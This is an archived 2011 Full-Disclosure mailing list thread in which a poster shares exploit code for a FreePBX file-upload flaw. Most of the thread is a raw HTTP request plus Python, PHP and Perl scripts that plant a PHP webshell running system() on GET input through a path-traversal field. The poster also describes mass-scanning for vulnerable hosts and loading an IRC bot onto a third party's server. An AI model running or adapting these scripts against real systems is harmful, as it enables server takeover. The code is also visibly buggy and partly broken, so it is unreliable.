| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 12 Jun 2011 09:51:53 +1000
From: "-= Glowing Doom =-" <secn3t@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: FreePBX - Module Administration Arbitrary
File Upload
hello,
In regards to this FreePBX exploit, wich i PoC'd, has anyone tried to use
the PoC ? If so, were you able to just axcs the folder,with OUT the admin
privs.
Im just abit confused, because the poc i did seems to have same
prpblem,altho, can apparently access the webshell, using the method
described in the older PoC (wich was only a month ago or so now)...
The Team who released the 'admin only' PoC, did not seem to do much about
showing theyre request session header details, so, i cannot see what they
are reporting here :s
this PoC , i found about 1mth ago, was just the session info, and header
data, the person who asked me to look into it more, told me it was 'working'
with NO admin privs, you just have to add the line in, wich points to YOUR
own /folder/ , wich, can be done thru manipulating the header data,and
config.php of the actual freepbx.
i also did a 'sweep' scan, on one range alone, i foubndapprox 400-500 of
this FreePBX,all linux...
On another note, I just found a MASSIVE RFI/RCE in almost EVERY torrent site
availabkle, actually, was a priv one, i just do not know wether to help the
admin, because last time i did this ( bur.st networking, reported 4 PoC's to
them, was also a donating user) , they BANNED me for explaining it...
Is it safer to post to this list ? Or, contact the vendor :s It seems that
when you contact vendors, another case, was a he.net box,wich STILL is
vulnerable, the he.net admin said to me the code was 'meant to be that way',
and allowed remote injection of a shell.. I tried to explain this, and they
said again, was normal and not a problem, however, then loaded as simple php
bot, and made it join irc, then started the PID about 20 times, the admin
finally looked into it, BUT, i was not thanked, not even close... lol,
infact, suspicion again.. this has now happened to me, about 5 times,
starting from bsd-secteam in early 2000's, about a cat command issue, wich
allowed me to replace master.;pass file... even then, i had problems
explaining to Colin Percival about it, he could not 'see' my PoC... yet, it
seems that he has patched it :s this wa also a problem in gentoo, and about
3 other distros, i could bring that up even , and, yes, 'cat' command, i
think because it was so simple, it was unbelievable to them... I am very
confused about how/what/whop to now contact, and im sitting on 3 MS
exploits, one of wich, attacks theyre patches!! i dont know what todo!!
please offer me any advice...
Also, please look into this seperate PoC for freepbx, as it apparently is
working, altho , i do not TRY to make peoples websites screwed etc,i am
happy to do a Poc but, i dont run local webserver at moment, am in the midst
of changing raqs over.. I am just after some help in regards to this.
Cheers,
xd / dru
On 10 June 2011 09:08, -= Glowing Doom =- <secn3t@...il.com> wrote:
> ehhhh .... php exploit code has a small bugs in it :P sorry... i just woke
> and should have looked... just look at part1 and part2 :) it is pretty
> simple to fix...
>
> also when uploading, you create your own /folder/ , using this method
> anyhow..
>
>
>
> On 10 June 2011 08:59, -= Glowing Doom =- <secn3t@...il.com> wrote:
>
>> Hello...
>> I wrote a PoC code, for similar bug in this application, about 3months
>> ago... unfortunately, i did not bother to put it on here because well, it
>> was nothing much.. but since this 'admin' module has appeared, i will add my
>> codes to the thing...: this needs for PBX to 'record' ,notsure if an admin
>> module is needed..it seems to ONLY look for the recordings... anyhow have
>> fun.. admin i believe :)... nice try to find the sploit guys, i have only
>> posted it on my blogs and pastebin about 400times in the past 4months... i
>> guess i will put it here next time.. here is some codes for you..:
>> -------------------------------------------------------------------------------------------------------
>> PoC
>> The HTTP request below illustrates the upload of a phpshell::
>>
>> POST /admin/config.php HTTP/1.1
>> Host: 10.10.1.3
>> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
>> en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
>> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> Accept-Language: en-us,en;q=0.5
>> Accept-Encoding: gzip,deflate
>> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
>> Keep-Alive: 300
>> Proxy-Connection: keep-alive
>> Referer: http://10.10.1.3/admin/config.php
>> Cookie: ARI=cookieValue; PHPSESSID=cookieValue
>> Authorization: Basic base64auth
>> Content-Type: multipart/form-data;
>> boundary=---------------------------5991806838789183981588991120
>> Content-Length: 116089
>>
>> -----------------------------5991806838789183981588991120
>> Content-Disposition: form-data; name="display"
>>
>> recordings
>> -----------------------------5991806838789183981588991120
>> Content-Disposition: form-data; name="action"
>>
>> recordings_start
>> -----------------------------5991806838789183981588991120
>> Content-Disposition: form-data; name="usersnum"
>>
>> ../../../../../var/www/html/admin/SpiderLabs
>> -----------------------------5991806838789183981588991120
>> Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
>> Content-Type: application/octet-stream
>> <?php
>> /* WebShell code goes here */
>> ?>
>> -----------------------------5991806838789183981588991120--
>>
>> OK SO...
>>
>> In python form:
>> #!/usr/bin/env python
>> import urllib, re, os, httplib, urllib2, time, socket, getopt, sys
>>
>> host = $host
>> port = 80
>>
>> s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
>> s.connectHTTP((host,port))
>> s.send(
>> 'POST /admin/config.php HTTP/1.1\r\n'
>> 'Host: ' + host + '\r\n'
>> 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
>> rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
>> 'Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
>> 'Accept-Language: en-us,en;q=0.5\r\n'
>> 'Accept-Encoding: gzip,deflate\r\n'
>> 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
>> 'Keep-Alive: 300\r\n'
>> 'Proxy-Connection: keep-alive\r\n'
>> 'Referer: http://' + host + '/admin/config.php\r\n'
>> 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
>> 'Authorization: Basic base64auth\r\n')
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---------------------------5991806838789183981588991120\r\n'
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---------------------------5991806838789183981588991120\r\n'
>> 'Content-Length: 116089\r\n'
>> '\r\n'
>> '-----------------------------5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="display"\r\n'
>> '\r\n'
>> 'recordings\r\n'
>> '-----------------------------5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="action"\r\n'
>> '\r\n'
>> 'recordings_start\r\n'
>> '-----------------------------5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="usersnum"\r\n'
>> '\r\n'
>> '../../../../../var/www/html/admin/zmeu.php\r\n'
>> '-----------------------------5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="ivrfile"; filename="zmeu.php"\r\n'
>> 'Content-Type: application/octet-stream\r\n'
>> '\r\n'
>> '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
>> '-----------------------------5991806838789183981588991120--\r\n'
>>
>> and...
>>
>> IN php:
>>
>> <?php
>> echo "\n\n";
>> echo
>> "+-------------------------------------------------------------------------+\r\n";
>> echo "| FreePBX 2o11 Remote File Upload Exploit |\r\n";
>> echo "| Usage: php exploit.php site.com
>> |\r\n";
>> echo
>> "+-------------------------------------------------------------------------+\r\n";
>> echo "\n";
>> echo "[+] Code to write to the file (Ex. id;uname -a):\r\n\n";
>> $code = trim(fgets(STDIN));
>> $socket = @fsockopen($argv[1], 80, $eno, $estr, 10);
>> if(!$socket) {
>> die("[-] Couldnt connect to: ".$argv[1].". Operation aborted.");
>> }
>> $part1 = "POST /admin/config.php HTTP/1.1\r\n";
>> $part1 .= "Host: " . $argv[1] . "\r\n";
>> $part1 .= "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X
>> 10.4.6)\r\n";
>> $part1 .= "Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
>> $part1 .= "Accept-Language: en-us,en;q=0.5\r\n";
>> $part1 .= "Accept-Encoding: gzip,deflate\r\n";
>> $part1 .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
>> $part1 .= "Connection: keep-alive\r\n";
>> $part1 .= "Keep-Alive: 300\r\n";
>> $part1 .= "Proxy-Connection: keep-alive\r\n";
>> $part1 .= "Referer: http://10.1.1.1/admin/config.php\r\n";
>> $part1 .= "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n";
>> $part1 .= "Authorization: Basic base64auth\r\n";
>> $part1 .= "Content-Type : multipart/form-data;\r\n";
>> $part2 =
>> "boundary=-----------------------------5991806838789183981588991120--\r\n";
>> $part1 .= "Content-Type : multipart/form-data;\r\n";
>> $part2 =
>> "boundary=-----------------------------5991806838789183981588991120--\r\n";
>> $part2 = "Content-Length: 116089\r\n";
>> $part2 .= "\r\n";
>> $part2 .=
>> "-----------------------------5991806838789183981588991120\r\n";
>> $part2 .= "Content-Disposition: form-data;
>> name=\"display\"\r\n";
>> $part2 .= "\r\n";
>> $part2 .= "recordings\r\n";
>> $part2 .=
>> "---------------------------5991806838789183981588991120\r\n";
>> $part2 .= "Content-Disposition: form-data; name=\"action\"\r\n";
>> $part2 .= "\r\n";
>> $part2 .= "recordings_start\r\n";
>> $part2 .=
>> "---------------------------5991806838789183981588991120\r\n";
>> $part2 .= "Content-Disposition: form-data;
>> name=\"usersnum\"\r\n";
>> $part2 .= "\r\n";
>> $part2 .= "Content-Disposition: form-data;
>> name=\"../../../../../var/www/html/admin/xd\"\r\n";
>> $part2 .=
>> "---------------------------5991806838789183981588991120\r\n";
>> $part2 .= "Content-Disposition: form-data; name=\"ivrfile\";
>> filename=\"shell.php\"\r\n";
>> $part2 .= "Content-Type: application/octet-stream\r\n";
>> $part2 .= "\r\n";
>> $part2 .= "<?php echo \'<pre>\' + system(\'$code\') +
>> \'</pre>\'; ?>\r\n";
>> $part2 .=
>> "-----------------------------5991806838789183981588991120--\r\n";
>> $part1 .= $part2;
>> fwrite($socket, $part1);
>> echo "[!] Check the upload folder (/var/www/html/admin/xd) ..";
>> } else {
>> echo "\n\n";
>> echo "+---------------------------------------------------+\r\n";
>> echo "| Usage: php exploit.php site.com |\r\n";
>> echo "+---------------------------------------------------+\r\n";
>> echo "\n\n";
>> }
>> ?>
>>
>> and in perl..
>>
>> #!/usr/bin/perl
>> use IO::Socket::INET;
>> use Crypt::SSLeay;
>> use Net::SSL;
>>
>> sub usage {
>> print "perl $0 <Host> <Cmd>\n";
>> exit(1);
>> }
>> my($host, $cmd) = @ARGV or usage();
>> print "[+] Connecting to host...\n";
>> my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort
>> => 80,Timeout => 10) or die "[-] Connect error..\n";
>> if(!sock) {
>> print "[-] Non-SSL PBX NOT HERE!\n";
>> exit(-1);
>> else {
>> $sock = Net::SSL->new(Proto => 'tcp',PeerAddr => $host,PeerPort =>
>> 443,Timeout => 10) or die "[-] Connect error..\n";
>> print "[-] SSL PBX NOT HERE!\n";
>> exit(-1);
>> }
>> print "[+] Connected.. Sending Buffer\n";
>> my $temp=
>> "POST /admin/config.php HTTP/1.1\n".
>> "Host: $host:80/\n".
>> "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\n".
>> "Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n".
>> "Accept-Language: en-us,en;q=0.5\n".
>> "Accept-Encoding: gzip,deflate\n".
>> "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n".
>> "Keep-Alive: 300\n".
>> "Proxy-Connection: keep-alive\n".
>> "Referer: http://$host/admin/config.php\n".
>> "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\n".
>> "Authorization: Basic base64auth\n".
>> "Connection: keep-alive\n".
>> "Content-Type : multipart/form-data;\n".
>> "---------------------------5991806838789183981588991120\n".
>> "Content-Length: 116089\n".
>> "\n".
>> "Content-Disposition: form-data; name=\"display\"\n".
>> "recordings\n".
>> "\n".
>> "---------------------------5991806838789183981588991120\n".
>> "Content-Disposition: form-data; name=\"action\"\n".
>> "recordings_start\n".
>> "\n".
>> "---------------------------5991806838789183981588991120\n".
>> "Content-Disposition: form-data; name=\"usersnum\"\n".
>> "\n".
>> "---------------------------5991806838789183981588991120\n".
>> "Content-Disposition: form-data;
>> name=\"../../../../../var/www/html/admin/xd\"\n".
>> "Content-Disposition: form-data; name="ivrfile"; filename="shell.php\n".
>> "Content-Type: application/octet-stream\n".
>> "\n".
>> "<?php ". $cmd ." ?>\n".
>> "-----------------------------5991806838789183981588991120--\n\n";
>>
>> print "[+] Sent file 'shell.php' to act as webshell ..\n";
>> my $buffer_size=length($temp);
>> $temp;
>> my $answer=0;
>> $buffer=~s/siz/$buffer_size/g;
>> print $sock $buffer;
>> if ($sock) {
>> print "[+] Buffer sent..running command: $cmd ..\n";
>> while ($answer=<$sock>) {
>> print $answer;
>> print results "[!] Server reply: $answer ..\n";
>> }
>> }
>> }
>>
>> have fun! Perl one is abit rough..
>> dru
>>
>> xd @ #haxNET @ Efnet
>>
>> (National LULZ day is here!)
>>
>> And for those guys who 'exploited' it... this PoC was released like
>> 3months ago... what the hell are yu guiys on about, and where is even a
>> HEADER showing explotation :S seems you have started a group but forgot to
>> check this for previous bugs :) hehe... nomatter, it is now debugged for
>> you.
>>
>>
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists